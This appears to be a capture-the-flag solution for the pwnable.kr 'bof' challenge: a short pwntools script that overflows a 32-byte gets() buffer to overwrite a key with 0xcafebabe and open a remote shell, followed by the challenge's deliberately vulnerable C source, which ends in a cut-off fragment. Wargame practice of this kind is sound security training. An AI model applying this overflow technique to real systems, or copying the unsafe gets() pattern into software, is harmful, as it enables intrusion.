from pwn import * p = remote("pwnable.kr", 9000) pay = b'A'*(0x2c+0x8)+p32(0xcafebabe) p.sendline(pay) p.interactive() #include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } // bof: partial R..